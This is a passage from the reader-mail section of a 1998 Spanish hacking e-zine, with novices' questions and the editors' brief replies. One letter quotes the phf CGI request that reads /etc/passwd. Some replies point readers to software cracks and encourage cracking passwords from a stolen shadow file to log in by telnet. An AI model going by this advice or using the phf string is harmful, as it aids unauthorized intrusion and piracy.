  tendr ya que mi cd-rom no es interno sino que al ser un porttil por la 
  cosa de que me saliera ms barato y aprovechar mas el hardware para el 
  futuro decid hace tiempo comprar un cd-rom (de tipo interno), que se 
  conectara al puerto paralelo por medio de una caja adaptadora especial. 
  Pero antes de nada paso a daros las caractersticas ms destacadas de mi 
  ordenador: 

  TIPO: NOTEBOOK (porttil) 
  MARCA: ACER EXTENSA 355 MMX 
  PROCESADOR: 133 MMX 
  RAM: 48 Mg. 
  DISCO DURO: 1,6 Gb. 
  DISKETERA: 3,5 
  CD-ROM: marca SAMSUNG 32X de instalacin interna pero conectado (EN EL 
  EXTERIOR) en el puerto paralelo por medio de una caja adaptadora especial 
  con fuente de alimentacin propia 
  MODEM: TARJETA PCMCIA a 33.6 baudios 
  ADAPTADOR DE PANTALLA: CHIPS &TECNOLOGIES 65550 PCI 
  TARJETA DE SONIDO: CONTROLADOR YAMAHA OPL3-Sax WDM 
  MOUSE: LOGITECH por puerto serie 
  Bien, dadas las caractersticas, paso a expresaros mis dudas principales... 

  (1) Tendre problemas al instalar LINUX sin tener drivers para cd-rom por 
  puerto paralelo que LINUX reconozca. 
  Si existen, donde puedo conseguirlos?. 

  (2) Cual de los sistemas operativos LINUX es el mas potente en relacion a 
  controlar sistemas de seguridad, o tiene mas futuro? GRACIAS... 

  P.D.: Agradeceria me contestaseis a mi en persona y despues si quereis 
  incluis mi consulta en vuestros e-zines. 

  Atentamente: delaosapavon@xxxxxxxxxxxxxx 

  <------>

  [ Pues no deberias tener problemas de ningun tipo, en caso de tener que
    usar drivers especificos pasate por el website del fabricante, donde
    seguramente podras conseguir drivers. 
    Sobre Linux, lo mejor seria que probases tu mismo las diferentes
    variantes, pero si quieres una bastante buena pillate el FreeBSD. ]

<>

  Date: Sat, 19 Sep 1998 20:21:57 GMT
  From: <tuliom@xxxxxxxxxxxxxx>
  To: "JJF HACKERS TEAM"
  Subject: Un pedazo 

  Team,

  Me dirijo nos mas, que para pedirles si me pueden obsequiar una 
  parte en su revista. 
  mi deseo es escribir un articulo donde se hable y explique el lenguaje 
  binario  y hexadecimal. 
  Pues me he dado cuenta de que ustedes lo tratan y conozco personas que leen 
  el e-zine que no lo manejan. 
  Es solo una pequea pero concreta explicacion. 
  Solo que de ustedes, mas si necesitan algun apoyo solo pidanmelo, que
  por aqui hay unos cuantos hackers pero no se atreven salir. 

  ah los felicito por el curso de hacking es el mejor praxis que he podido 
  ver en lo que al tema refiere. 

  e. 

  <------>

  [ Pues enviamos ese articulo y te lo ponemos gustosos en el ezine :)
    Thx por la felicitacion. Leer FAQ. ]

<>

  Date: Sat, 19 Sep 1998 13:54:58 GMT
  From: "LordByte" <amestoy@xxxxxxxxxxxxxx>
  Subject: Posible fallo en el Doawnload del volumen I (Zip) 

  Pues nada colegas, no se si sera mi descompresor o no. Pero el volumen uno
  con todos los E-Zines no se puede descomprimir por fallo del archivo y creo
  que habiendolo bajado tres veces y comprobado es suficiente. O lo teneis
  mal, o soy mas torpe que un cisne con botas.
  Bueno pues por mi parte nada mas, enhorabuena por vuestro trabajo y
  adelante.

    LordByteDeKyler -:-*]

  <------>

  [ Tu descompresor no funciona bien o tu no... porque el zip funciona 100%,
    verificado por nuestros tecnicos ;-) ]

<>

  Date: Tue, 15 Sep 1998 09:26:07 GMT
  From: <tuliom@xxxxxxxxxxxxxx>
  To: "JJF HACKERS TEAM"
  Subject: Notificacion 

  Team,

  El e-mail es para avisar esto, ustedes se procupan por su web y no parace
  molestarle este tipo de mensaje, como ,estoy de acuerdo les informo. 

  Tengan cuidado el pimer Crak de su pagina la baje y no funciono, 
  estoy utilizando un pentium 166 mhz Winzip 95 y Explorer 4.01 sp1. 

  Y Praker, hize click en programa para hacer llamadas gratuitas y me dijo 
  algo en ingles como: el servidor no contesta o no se pudo establecer
  conexion o error de sintaxis del servidor remoto. 

  Bien asi que mejoren esto team que ustedes son unicos. 
  los mejores por favor no decaigan........... 

  Estamos dentro 

  Vikingo Hacker 

  <------>

  [ No todo siempre funciona y mas cuando son crack's o programas de phreak. ]

<>

  Date: Sat, 12 Sep 1998 04:34:52 GMT
  From: 444525@xxxxxxxxxxxxxx
  To: jjf_team@usa.net 

  holas escribia para ver si os interesaba ke escribiera un artikulo sobre 
  OTP. 
  es otro sistema de hacer login en un ordenador de manera ke el passwd 
  sea distinto kada vez ke entras,de manera ke aun snifando el pass 
  no te serviria de nada. 
  seria un artikulo de simple informacion,no de komo hackearlo. 
  La verda es ke aun no lo he visto en ningun sistema pero bueno. 

  <------>

  [ Pues claro, envianoslo y lo pondremos cuanto antes. Leer FAQ. ]

<>
  
  Date: Mon, 07 Sep 1998 19:31:27 GMT 
  From: David <dtarro@xxxxxxxxxxxxxx>     
  To: jjf_team@usa.net 
  Subject: hola 
  
  HOLA SOY UN CHICO ESPAOL DE 15 AOS, ME GUSTARIA QUE ME ENSEARAIS TODO LO 
  QUE SABEIS SOBRE EL HACKING, SE PROGRAMAR MUCHO EN BASIC, CUALQUIER BASIC, 
  SE UN POCO DE C, C++, TENGO EL LINUX, NO ME IMPORTA ESTUDIAR CONTESTARME OK? 
  E OK? 

  <------>

  [ Pues lo dicho 1001 veces, lee nuestro ezine y todo lo que pase por tus
    manos. ]

<>

  Date: Mon, 07 Sep 1998 18:58:18 GMT 
  From: "Francesco Kywocs" <kywocs@xxxxxxxxxxxxxx>     
  To: jjf_team@usa.net 
  Subject: Aclaraciones... : - ) 
  
  Hola a todos los del JJF-TEAM, 
  bueno, yo soy una persona que esta entrando recien en el tema. 
  Y el grupo de ustedes fue el que mas me gusto, y me baje la E-ZINE de 
  JJf-TEAM, pero tengo tres problemas: 
  Primero, siempre hablan de UNIX, para ser necesario para hackear y como 
  no lo tengo queria saber alguna informacion del tipo, la empresa que la 
  vende, cual es la mejor version y cosas por estilo. 
  Segundo, en la E-ZINE n3 publicaron un log famoso que se uso para el 
  hackeo de un server. Mis dudas son, que es un log B-( , y que significan 
  esas cinco o seis paginas llenas de palabras, que intento entender sin 
  solucion. 
  Y mi tercer problemas es que muchas veces dan codigos de fuente que aun 
  no entiendo si estan escritos en c o otra cosa, como el que sale en el 
  "Curso de hacker 2" en la E-ZINE n2. 
  bueno ya dejo de molestarlos y muchas gracias. 
  Espero vuestra respuesta para yo tambien aprender. 
  ~~>C H A O<~~ 
  Mi E-Mail es: kywocs@xxxxxxxxxxxxxx 
  Se despide KyWoCs... 

  <------>

  [ El Unix no es necesario para ser un Hacker, leer el articulo de Tasslehoff
    para salir de dudas. Un log es un fichero en el cual se guardan los
    distintos sucesos que sucende en el ordenador. Ese log simplemente revela
    la entrada de un Hacker a un sistema informatico y que hizo dentro de el,
    o sea los comandos que ejecuto. Sobre el Codigo fuente normalmente se
    suele poner que tipo de lenguaje es. ]

<>
  
  From: Nain <nii97068@xxxxxxxxxxxxxx>     
  To: jjf_team@usa.net 
  Subject: pregunta 

  hola,
  acabo de descubrir vuestra revista y me la quiero bajar... todos los n's 
  para leerla tranquilamente, sin embargo tengo un problema, siempre que 
  intento bajarmela, nunca esta completa... siempre las frases estan cortadas 
  por la mitad. que puedo hacer para solucionar esto? 
  Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de 
  leerla. 

  Un saludo.udo. 

  <------>

  [ Pasate por nuestro FTP. ]

<>

  From: "esteban" <esteban@xxxxxxxxxxxxxx>     
  Subject: preguntas 

  hola me llamo sebastian, deseo hacerte unas preguntas:
             
  me he propuesto hackear mi primer web el ultimo dia de este ao (1998),
  quisiera  que me indiques los pasos para conseguirlo, asi como textos que
  me ayuden a conseguirlo, en espaol, ademas trabajo con el windows 98,
  segun tengo entendido esto no es muy util, ahora como puedo cambiarme a
  unix, con que libro puedo aprender a usarlo?, que es un cracker y un
  phreak?, como hackear desde windows 98?, que libro me recomiendas para
  aprender a programar en c?, que necesito para llegar a ser un hacker?,
  como puedo llegar a ser un hacker?.
             
  por ultimo te felicito por la revista es muy interesante
             
  gracias.

  <------>

  [ Pues suerte y enviamos tus resultados para el ezine :)
    Sobre libros pasate por una buena libreria y decide por ti mismo. ]

<>

  Date: Sun, 18 Oct 1998 01:55:08 GMT 
  From: Jorge <jlimy@xxxxxxxxxxxxxx>    
  To: conde_vampiro@usa.net 
  Subject: Hackers 
  
  Por favor me decis que es una llave PGP?? Muchas gracias, y como 
  puedo recuperar el password de mi Bios? 

  Muchas Gracias. 
  Jorge Irrazabal 
  Por Favor respondeme a jlimy@xxxxxxxxxxxxxx 

  <------>

  [ PGP (Pretty God Privacy) es un sistema de encriptacion. Para recuperar
    el password de la BIOS pasate por nuestra seccion de CRACK en la cual
    encontaras varias utlidades para ello. ]

<>
 
  From: "Eduardo" <h82867@xxxxxxxxxxxxxx>     
  Subject: Consulta 
  
  Hola soy Eduardo de Murcia, y me gustaria hacerte una pregunta. Espero
  que no sea mucha molestia. 

  La pregunta es:

  Si yo me instalo un programa de esos que dan comprando una revista que
  son de esos que tienes 30 dias para probarlos y luego ya no van, una vez
  que se han pasado los 30 das que se puede hacer para que siga
  funcionando? yo lo que hago es darle al reloj del ordenador para atrs y
  asi funciona, pero eso es un coazo y se que hay personas que borrando
  unas cosas del regedit ya no hace falta hacer eso del reloj y querria saber
  si tu podras decirme que es lo que hay que borrar del regedit para
  hacerlo, o si hay alguna otra manera para que esos programas funcionen. 

  Muchas gracias por todo 

  Un saludo.

  <------>

  [ Pues lo de debes hacer es usar un crack siempre y cuando no obtengas
    beneficios economicos por el uso de ese software. ]

<>

  Date: Sun, 11 Oct 1998 18:35:23 GMT 
  From: "Mr. Aztech" <mr_aztech@xxxxxxxxxxxxxx>     
  To: "conde_vampiro@usa.net" 
  Subject: Solicitamos su ayuda 
  
  Muy buenos dias tengo mi estimado conde vampiro, por medio 
  de la presente lo invito para que se presente a declarar a 
  la suprema corte de justicia.............. 

  No te creas, perdon por la broma, te escribo o le escribo 
  este mail, para solicitarle su ayuda, lo que pasa es que 
  nos juntamos aproximadamente 13 personas para hacer un 
  articulo sobre iniciacion en hacking, pero este no es uno 
  mas sino que esta hecho por gente nueva en esto, llegamos a 
  la solucion de que solo asi podriamos satisfacer las dudas 
  de la gente, de newbees a newbees, me entiendes, por lo que 
  me diriji a usted, por ser conocido en el medio, se que 
  normalmente dira, no damos cursos particulares, pero no 
  sera ni un curso ni sera para mi, sera para la elaboracion 
  de un exelente serie de articulo que posiblemente lleguen 
  hasta su zine, por lo que hay le van algunas de nuestras 
  dudas: 
  1.-Como hace generalmente alguien del medio para 
  introducuirse a una comp. bueno se que suena muy genral, y 
  diras, primero estudia basic, pero ya lo se, a lo que me 
  refiero es:Primero, consigo informacion sierto? Que 
  informacion? Luego investigo sus vulnerabilidades? Cuales 
  son las mas comunes? 
  Aparte de busgs y exploits e ing? Que otra forma hay de 
  colarse? 
  Esperamos sus respuestas 
  Atte.Aztech 

  <------>

  [ Pues me suena a clase privada y de eso no damos :) Para aprender sobre el
    tema leer este ezine :) ]

<>

  Date: Thu, 08 Oct 1998 15:33:24 GMT 
  From: DrDoom <drdoom@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: Saludos de Satan On-Line 
  
  Saludos de Satan On-Line y bienvenidos a RC5. 
  Nosotros ya llevamos un tiempo en esto. Pero cuantos ms mejor. 
  http://rc5stats.distributed.net/tmsummary.idc?TM=3085085 

  <------>

  [ Por supuesto cuantos mas mejor, pero nosotros preferimos el JJF RC5 Crack
    Team :) ]

<>

  From: Cyborg <cyborg@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  
  hola, cada vez que intento bajarme el numero 6 de vuestra revista se me 
  queda a medias no se porque. Os agradeceria que lo comprimierais en zip 
  (aunque siempre decis que no quereis para que lo pueda leer todo el 
  mundo y todo eso) o si podeis enviadmelo por email. 

  gracias :) 

  <------>

  [ Pasate por nuestro FTP. ]

<>
  
  Date: Tue, 06 Oct 1998 09:47:56 GMT 
  From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: JJF RC5 Crack Team 
  
  Hi! 

  Te he envio el mail a ti ya que pareces ser el cabecilla :) 

  He intentado seguir las instrucciones que davais de los pasos que habia 
  de seguir. Pero donde pone: 
  4. Al dia siguiente chequea tu estatus y edita tu informacion personal 
  en http://www.distributed.net/ 

  5. En tu informacion personal, afiliate al ID:7281. El grupo de J.J.F. / 
  HACKERS TEAM 

  No se que kereis decir ya ke he mirado en distributed.net i no sale nada 
  de editar tu informacion personal. 

  GraxiaS 

  P.D. Contestame, ok? (tb estoy interesado en H/P/V/C) 

  <------>

  [ Pues es realmente facil, vuelvetelo a leerte de como se hace otra vez. ]

<>

  Date: Wed, 07 Oct 1998 07:48:51 GMT 
  From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
 
  H! 

  Conde 

  Te he envie un mail ayer pidiendo ayuda sobre el RC5-64 y... 

  Edit Participant Information 
  Password is incorrect 
  CPSR distributed.net Electronic Frontier Foundation EPIC Free Software 
  Foundation Project Gutenberg Software in the Public Interest 

  segui tus instrucciones pero no me carbura... :( 
  Espero ke me ayudes 
  Nos vemos 

  Spl00t 

  <------>

  [ Claro, el password lo recibes via mail que te envia distributed.net y
    despues pones tu password en tu web personal. ]

<>

  Date: Wed, 07 Oct 1998 08:36:14 GMT 
  From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: Pardon 
  
  h! 

  Perdoname al final lo he conseguido ya ke me hecho un lio de mails xD 
  Me gustaria conseguir mas info sobre el grupo y luego si me pudieses 
  comentar algo de H/P/V/C 

  P.D. CONTESTA 

  Bye Conde Vampiro 

  Spl00t 

  <------>

  [ Okis :) Bienvenido a JJF RC5 Crack Team. Que grupo, - J.J.F. / Hackers
    Team - o el JJF RC5 Crack Team, ya que son cosas diferentes? ]

<>

  Date: Tue, 06 Oct 1998 09:09:36 GMT 
  From: "shelton sol" <librepensador@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: !!
  
  WOW! 
  HE ESTADO LEYENDO TU ARTICULOS Y TU PAGUINA 
  Y DEJAME DECIRTE QUE HE QUEDADO BOQUIABIERTO 
  ES EL 1ER LUGAR DONDE NO LES IMPORTA EL ENSEAR 

  YO QUIERO APRENDER! 
  PERO NO HE SABIDO BUSCAR,Y AHORA HE ENCONTRADO 
  EL LUGAR,PERO TENGO UN PROBLEMA SERIO.NO SE NADA! 
  CREI QUE EL ASUNTO HACK SERIA MAS SENCILLO 
  LO UNICO QUE SE ES DEL EL HACK DE ICQ,NUKES ETC 
  Y MUUUUUY POCO ,NO HE PODIDO GARANTIZAR LA EFECTIVIDAD DE NINGUNO,CREO 
  QUE ME HA SALIDO DE CASUALIDAD. 
  EN FIN... 
  YO QUIERO APRENDER......Y A UD NO LES MOLESTA EL ENSEAR.....Y NO CREAS 
  QUE VENGO A QUE ME PONGAN TODO EN BANDEJA DE PLATA...PERO TE REPITO NO 
  SE NADA DE NADA....LEI EL 1ER ARTICULO DE COMO HACKEAR 
  EL DE "HACKER TEAM JOURNAL" Y ME HE QUEDADO ATONITO POR LO IMBECIL QUE 
  SOY..JEJEJEJEJE......PERO PARA CUANDO TE LLEGUE ESTE MAIL CREO LO PODRE 
  COMPRENDER MEJOR....LO HE IMPRIMIDO PARA ESTARLO LEYENDO. 

  QUIERO APRENDER! 

  ...YA NO SE QUE MAS DECIR ...SOLO TENGO UNA PALABRA EN MI CABEZA QUE ME 
  PERFORA EL CEREBRO 

  C.U.R.I.O.S.I.D.A.D 

  EN CASO DE QUE NO ME QUIERAN ENSEAR...PIDO POR FAVOR CONTESTEN ESTE 
  MAIL. 

  NO SE SI UDs. TENGAN ICQ.PERO POR SI TIENEN HE AQUI MI NUMERO XXXXXXXX 
                                                                
  SH 

  PD. 
  SOLO INGRESAN A EL JJF HACKER TEAM ,LOS QUE SABEN? 

  UNA COSA MAS....COMO PUEDO SABER CUANDO ,QUIEN ENTRA A MI PC CON UN 
  TROJAN? 
  POR QUE HE INSTALADO UN ANTI TROJAN "TOILET PAPER" 
  Y MARCA A CADA MOMENTO UNA VIOLACION EN EL MODULO NO SE QUE... 

  BUENO ME DESPIDO 

  <------>

  [ Pues para aprender lee con atencion este ezine. En - J.J.F. / Hackers
    Team - solo entran personas con cierto conocimiento por varios motivos
    que no vienen a cuento. Sobre ese detector de troyanos que comentas no
    lo conozco por eso no se decirte. ]

<>

  De: Desconocido <Pans@xxxxxxxxxxxxxx>
  A: conde_vampiro@usa.net 
  Fecha: domingo 4 de octubre de 1998 15:47 
   
  oye , necesito que me mandes alguna manera de crackear los logins y 
  passwords de los servidores , que no sea la de poner el comando 
  (/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd) a la direecion del 
  navegador. 
  Porque nunca funciona y te aseguro que lo he provado con mas de 
  300 direeciones de internet. 
   
  O si tienes algun login y password , para poder telnetear , pasmelo , 
  estaria muy agradecido. 
   
  O si tambiien hubiera un programa que lo crackeara tb. 
   
  HAAAAAAAAa , y que ........esto si que no creo. Hacker's Utility v 1.02 , 
  este programa funciona bajo windows , y es un programa que trae todas las 
  herramientas para poder hackear , desde finger , hasta crackeadores de
  passwords , nt , w95 , *.zip , ecta , osea un poco de todo. Gracias Al menos
  lo he intentado , porque cuando leas este mail , primero , te reiras , luego
  , te cachondearas , y luego pasaras de responderme con otro mail. Seguro     

  Pero gracias de todas formas.

  <------>

  [ Pues para informacion lee este ezine. Sorry pero no enviamos ningun tipo
    de informacion de esa clase a los lectores. Para programas crackeadores
    pasate por nuestra seccion de CRACK. ]

<>

  Date: Sat, 03 Oct 1998 20:58:14 GMT 
  From: "Raphael da Costa Miranda" <treviland@xxxxxxxxxxxxxx>     
  To: <"conde_vampiro@usa.net"> 
    
  hi, conde vampiro!!!!!!!!! congratulations for this page,  it is very good
  I don't speak english very well, because Iam from brazilian.
  please, give a e-mail with craks write in portuguese.
  and what's the best crak for peolple fall of the net and find a password
  and the e-mail. I want be a new hacker of this group!!!!!!!!!
  if you write in portuguese or spanish is better!!!!!!!! 

  <------>

  [ Y esto de donde sale?? Nuestro website esta solo en espaol, por el
    momento :) Cada dia somos mas Internacionales. ]

<>

  Date: Wed, 30 Sep 1998 10:11:59 GMT 
  From: "MARIA PILAR " <mapii@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: AYUDA 
  
  HOLA 

  SOY COLOMBIANA 

  MI PREGUNTA ES LA SIGUIENTE... COMO DESEO U OBTENGO EL IP DE ALGUNA PERSONA. 
  CUANDO DICHA PERSONA ME MANDA UN MENSAJE YA SEA POR CHAT , ICQ, NETMEETING 

  LA RAZON ES LA SIGUIENTE ... HAY UNA PERSONA QUE ME BLOQUEA MI COMPUTADOR,
  ME MANDA MENSAJE OBCENO, ME DICE QYE QUIERE BORRAR MI DISCO DURO....NO SE
  QUIEN ES... PERO TENGO UN PROGRAMA WINNUKE95 PARA BLOQUERLO PERO NECESITO
  EL IP DE ESA PERSONA... PERO NO SE OBTENERLO ..ME DICE QUE HAY UN RPOGRAMA
  QUE MUESTRA EL IP DE LA PERSONA CUANDO LE MANDAN MENSAJE, CORREO, CHAT 
  AYUDENME... 
  GRACIAS.... 

  <------>

  [ Pues tiene varias opciones si estas usando un programa de chat,
    simplemente escribe:

    /dns nick

   Para ICQ existen programas especificos para ello. ]

<>

  Date: Mon, 28 Sep 1998 11:22:35 GMT 
  From: "Eduardo" <h82867@xxxxxxxxxxxxxx>     
  To: <"conde_vampiro@usa.net"> 
  Subject: consulta 

  Hola me llamo Eduardo y soy de Murcia. He entrado en vuestra pgina Web y
  me ha parecido muy interesante y de las pocas de hackers que me han servido
  de algo. Yo soy un novato en el mundo de los hackers y tengo mucha
  informacion que he sacado por ahi pero no me sirve de nada y queria
  preguntarte unas dudas que tengo para ver si tu me las podrias resolver:
             
  1. Si yo s el password de otro, Qu tengo que hacer para entrar en su
     ordenador? o sea donde tengo que poner ese password o que es lo que se
     hace para acceder a su ordenador.
             
  2. Como se puede uno conectar a internet gratis, porque mi madre me va a
     cortar el cuello ya que las facturas de telefono cada vez bienen mas
     altas.
             
  3. Si uno no tiene Unix no puede hackear?, es que yo tengo como sistema
     operativo Windows 95.
            
  Espero que no sea mucha molestia. Si por lo que sea no puedes contestarme a
  las preguntas mndame de todas maneras un mensaje para que yo sepa que has
  recibido mi mensaje. Mi direccion es: h82867@xxxxxxxxxxxxxx
             
  Gracias y hasta otra.

  <------>

  [ 1- Primero aprende a manejar Internet y como se conectan a otras
    computadoras antes de nada :) 2- Eso se llama Phreaking. 3- Si se puede,
    si se sabe como. ]

<>

  Date: Wed, 23 Sep 1998 19:34:25 GMT 
  From: j-cool@xxxxxxxxxxxxxx    
  To: conde_vampiro@usa.net 
  Subject: ayuda 
  
  comunicate conmigo necesito ayuda acerca de v.... 
  nesecito hacer uno 

  <------>

  [ Si quieres algo pues escribe un mail en condiciones pero creo que se por
    donde van los tiros, o sea que no creo que te ayudemos mucho. ]

<>

  Date: Sun, 20 Sep 1998 16:55:02 GMT 
  From: JAIRO CASAS <gotich@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: Un aprendiz! 

  Hola Conde: 

  Primero que todo quiero felicitarte por la gran labor que esta realizando tu 
  equipo (suena un poco cursi, no?). Ademas quisiera hacerte un par de
  preguntas si no es mucha molestia: 

  1) Que metodo que emplearias para hackear una pagina web que no utilice
     servidor unix? 

  2) Cuando hablas de TENER CUIDADO a que peligros te refieres? 

  3) Para que sirve un dialer/scanner? 

  4) Como hago para no dejar pistas en un sistema? 

  J.C. 

  <------>

  [ 1- Existen muchas maneras. 2- A que te cojan con las manos en la masa.
    3- Para descubrir ordenadores conectados al telefono. 4- Pues borrar las
    huellas, que realmente es casi imposible. ]

<>

  Date: Sun, 13 Sep 1998 19:27:08 GMT 
  From: scarcamo@xxxxxxxxxxxxxx (Sergio Antonio Carcamo Villegas)    
  Subject: necesito tu ayuda !!! 
               
  hola Conde Vampiro , espero que bien, sabes necesito tu ayuda sobre los
  hackers , ya que mi intencion es convertirme en uno de uds, pero para
  propositos en beneficios de los demas, como por ejemplo acabar con la
  pornografia infantil., etc
             
  asi que necesito saber como empiezo, que debo estudiar.

  espero que me contestes porque estare esperando tu rspuesta... se
  despide un amigo chileno Sergio Carcamo.
             
  PD: Es bueno la organizacion donde estas J.J.F hackers.... :-)
             
  por favor escribeme ya...

  <------>

  [ Pues lo de siempre, lee este ezine y todo lo que puedas. ]

<>

  Date: Thu, 10 Sep 1998 12:06:27 GMT 
  From: "Japer,s.c." <pilatos@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: Aprendiz de Hacker 
  
  Hola que pasha tio, te mande un mail pero no me contestaste y espero que 
  si lo hagas ahora a mi direccion nueva que es chenatiun@xxxxxxxxxxxxxx 

  <------>

  [ No se que mail te refieres ya que recibo muchos, ademas contestamos
    mediante el ezine. ]

<>

  Date: Sun, 06 Sep 1998 15:09:28 GMT 
  From: "Aztech's Mail" <aztech@xxxxxxxxxxxxxx>     
  To: Desconocido 
  Subject: AYUDA 
  
  Que onda te leo en la revista, ya se que no dan clases particulares, pero 
  pues dices que cualquier duda que tengamos contigo mero, pues yo soy muy 
  obediente, mira estoy tratando un sistema AIX 3, no se si me puedas 
  ayudar? 

  Esto es lo que tengo, su escaneado de puertos, su fichero passwd, con 
  shadow, que lo saque mediante un bug del send mail, que puedo hacer para 
  entrar, no se, una sugerencia, con exploits que conoscas para este sistema 
  operativo o algo por el estilo. 

  De antemano gracias 

  AZTECH 

  <------>

  [ Pues ahora solo te queda averiguar los password y te conectas por telnet
    y asi empiezas, pero ante todo no inflinjas ningun dao al sistema, ya
    que entonces no eres un Hacker. ]

<>
 
  Date: Fri, 04 Sep 1998 05:08:50 GMT 
  From: "KraKen ." <enter_logon@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: Traduccion de boxes 
  
  Aupa tios!. Antes de nada, tengo q diciros que teneis una Web cojonuda. 
  Para ir al grano: podriais traducirme la Lunch Box?. Es que mi ingles 
  es penoso. Gracias de todas formas. 
  Ah!, otra cosa (es una hipotesis): si yo tuviera un amigo imbecil 
  perdido, y quisiera joderle, sabiendo que a una hora determinada va a 
  estar conectado podria de alguna manera meterme en su PC, aprovechando 
  eso de lo bidireccional de la conexion, o es una fantasmada de esas q 
  solo se ven en la tele?. Si se puede podriais decirme como? (repito que 
  es solo una hipotesis). 
  Gracias 

  <------>

  [ Thx pero por ahora nadie de - J.J.F. / Hackers Team - traduzira ese
    documento, si algun lector esta interesado pues que nos envie la
    traduccion. Para metodos de entrada leete bien este ezine. ]

<>

  Date: Tue, 18 Aug 1998 07:52:44 GMT 
  From: PlaXiuS <plaxius@xxxxxxxxxxxxxx>     
  To: conde_vampiro@usa.net 
  Subject: Gracias!!! 
  
  Muchas Gracias Conde_Vampiro por tu apreciacion y tu opinion ... la 
  publicaremos en el numero 3 de Proyecto_R que se va a demorar un poquito 
  ya que tenemos unos articulos bastantes extensos que deseamos entregar.
  La verdad es bastante duro mantener un magazine en especial cuando los
  colaboradores brillan por su ausencia. Bueno ahi va mi PGP por si acaso.
  normalmente no la uso ya que no tengo nada que ocultar hee pero si
  tienes algo personal que contarnos ahi esta !!!! Quiero felicitarte por 
  el enfoque que le has dado a JJF , sobre el hacking como arte ya que no 
  incitan a la ilegalidad como otras E-Zine , ni al anarquismo y esas 
  cosas !!!! buen camino amio . 

  Saludos Terricolas !!!! 

  PlaXiuS 

  <------>

  [ Thx y muy interesante Proyecto R. Hasta la vista, compaero. ]

<>

  Date: Sat, 31 Oct 1998 23:22:02 GMT
  From: leandro moises <leandro2000@xxxxxxxxxxxxxx>
  To: conde_vampiro@usa.net

  HOLA QUE TAL ACA LES ESCRIVO DESDE ARGENRINA Y LA VERDAD ME GUSTO
  MUCHO SU WEB ,BUENO VOY AL GRANO LA VERDAD UNOS DE LOS TEMAS QUE MAS 
  ME GUSTARIA SAVER Y ME INTERESASN SON EL PRHach y por su puesto en 
  segundo lugar todo ACERCA DEL HACK,CRACK.ETC 
  BUENO LA VERDAD ES QUE YA NO SE QUE HACER POR QUE ME HE VAJADO 
  CUALQUIER CLASE DE PROGRAMAS ,DOCUMENTO Y ESA CASAS Y LA VERDAD E 
  LEIDO PROBADO CON TODO SIN UN SIMPLE RESULTADO . BUENO DESDE ACA LES 
  PIDO PORFAVOR UN CONSEJO UNA AYUDA PARA PODER INTERIORIZXARME E HACER 
  ALGO UTIL MUCHAS GRACIAS Y ESTA NO EL APRIMERA VEZ QUE LOS VOY A JODER.
  SE LOS PROMETO

  5D2 

  <------>

  [ Pues primero lo mejor es aprender a escribir correctamente :)
    Nuestro consejo, es el de siempre, lee este ezine y todo lo que puedas
    con mucha atencion, investiga y saca tus propias conclusiones. ]

<>
  
  Date: Sat, 31 Oct 1998 15:28:35 GMT
  From: Javier <jjavierr@xxxxxxxxxxxxxx>
  To: conde_vampiro@usa.net
  Subject: Hola!!! 

  Hola Conde Vampiro
  Quiseria que me mandaras unos manuales para hacker windows95 asi como para
  cambiar la fastidiosa pantalla al inicar windows.
  Por favor te lo agradecieria mucho

  <------>

  [ Sorry, pero nosotros no enviamos nada, leer FAQ. Te recomiendo que leas 
    este numero, que seguro que te sorprendera con agrado. ]

<>

  From: Nestor <nesertzen@xxxxxxxxxxxxxx>
  To: conde_vampiro@usa.net
  Subject: Hola 

  Hola conde
  que tal... soy un aprendiz de hacker....bueno a menos quiero serlo....
  me gusto mucho su pagina la J.J.J HACKERS TEAM, todavia no estoy a la
  altura como para estar en su team, pero me esforsare por seguir
  intenandolo... tengo una duda y espero que me pueda ayudar, que tengo que
  hacer con la Llave Publica PGP JJF, tengo que compilarla?, en que lenguaje?
  o solo la pongo en el espacio de password,me gustaria que me respondas... 
  tambien me gustaria ayudar a romper el algoritmo pero realemte no tengo ni
  idea de como hacerlo si me dan una idea lo intentare 
  gracias 

  Nestor 

  <------>

  [ Lo primero, escribe nuestro nombre correctamente. Para usar la llave PGP,
    necesitas el programa PGP, en la documentacion veras como se usa :)
    Supongo que te refieres al RC5, pues lee la seccion de
    NOTICIAS UNDERGROUND para mas informacion. ]

<>

  Date: Thu, 29 Oct 1998 13:19:53 GMT
  From: Javier <jjavierr@xxxxxxxxxxxxxx>
  To: conde_vampiro@usa.net
  Subject: Hola!!!!!! ATTE Zero^CooL 

  Hola Conde Vampiro te mando un grato saludo.
  Como soy nuevo en lo de los hacker, quisiera que me dijeras ujnos prgramas
  que debe tener cualquier hacker pues no se mucho de esto te agradeciera
  que me dieras el nombre y si puedes la pagina de donde bajarlos.

  BYE.

  <------>

  [ Hombre, programas de hackers ahi mil, tambien depende de lo que hagas,
    lo mejor que puedes hacer es probar por ti mismo y asi decides cual te
    gusta mas. ]

<>

  From: "LUIS S. GONZALEZ A." <gonzalezluis@xxxxxxxxxxxxxx>
  To: conde_vampiro@usa.net
  Subject: union 

  Iluestre CV.
  Deseo ser parte del y ayudar en lo posible para que este proyecto llegue 
  a su feliz y deseada culminacion. 
  Unidos venceremos. 

  <------>

  [ Pues para ser sincero no se a que proyecto te refieres. Si es al de RC5,
    pues adelante ;-) ]

<>

  Date: Mon, 02 Nov 1998 14:48:09 GMT
  From: "LAUTARO TELLECHEA" <lautarotellechea@xxxxxxxxxxxxxx>
  To: jjf_team@usa.net
  Subject: Dear Amigos... 

  Que tal... se que es un poco ortodoxo pero bien, quiero felicitarlos por
  los numeros del e-zine, me los he bajado todos y bien... hay muchas 
  cosas de las cuales no entiendo un pomo pero otras me parecen muy 
  dulces... soy de Argentina y quisiera mandarles unas trampillas que he 
